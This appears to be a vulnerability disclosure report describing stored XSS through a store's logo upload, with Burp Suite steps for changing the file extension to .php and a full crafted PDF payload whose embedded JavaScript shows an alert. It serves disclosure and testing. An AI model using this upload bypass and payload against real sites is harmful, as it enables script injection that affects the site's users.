Description

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.

1-Login to your application and create a Store called “Test” make all the other details as default
2. Navigate to “ Store Settings—>General” Tab
3. Under the “Branding” Section there is a “ Choose File” To select a Logo for our Store.
4. Select “Choose File” Option to Select an Image, Select any “.png” image you want.
5. Intercept the Post-Request for “Choose File” Option using Burpsuite
6. First delete the Content of uploaded “ png file “ then change the extension from “.png” to “.php” i.e( filename= “profile-picture.php”) and in the Content add the below payload

##Payload: ```%PDF-1.3
%����
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert(“bypass CSP XSS”)
} catch (e) {
app.alert(e.message);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream

BT
/F1 24 Tf
ET

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

<</Root 1 0 R /Size 5>>
startxref
493
%%EOF

7.  send the request and open the image you can see the xss